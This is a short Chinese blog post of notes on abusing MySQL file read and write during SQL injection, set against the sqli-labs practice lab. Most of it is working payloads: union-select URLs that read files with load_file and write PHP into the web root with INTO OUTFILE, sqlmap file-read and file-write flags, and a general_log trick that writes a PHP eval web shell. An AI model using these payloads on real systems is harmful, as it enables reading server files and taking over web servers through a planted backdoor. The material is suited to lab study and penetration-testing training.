mysql读写文件
1、需要条件
secure_file_priv不为null
1、限制mysqld 不允许导入 | 导出
secure_file_priv=null或secure_file_priv
2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
secure_file_priv=/tmp/
3、不对mysqld 的导入 | 导出做限制
secure_file_priv=
具有高权限
1)读文件
load_file("D:\flag\1.txt") #文件路径需要转义一下
http://127.0.0.7/sql/sqli-labs-master/Less-1/index.php?id=-1' union select 1,load_file("D:\\1.txt"),3%23
2)写文件
into outfile "路径"
http://127.0.0.7/sql/sqli-labs-master/Less-7/?id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "D:\\phpStudy\\WWW\\sql\\sqli-labs-master\\Less-7\\1.php"%23
3)sqlmap读写
--file-read "路径"
--file-write "要写入的内容或所在文件路径" --file-dest "要写入的路径"
2、当secure_file_priv为NULL时的利用方法
set global general_log=on;set global general_log_file='C:/phpStudy/WWW/789.php';select '<?php eval($_POST['a']) ?>';
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· winform 绘制太阳,地球,月球 运作规律
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· AI 智能体引爆开源社区「GitHub 热点速览」
· 写一个简单的SQL生成工具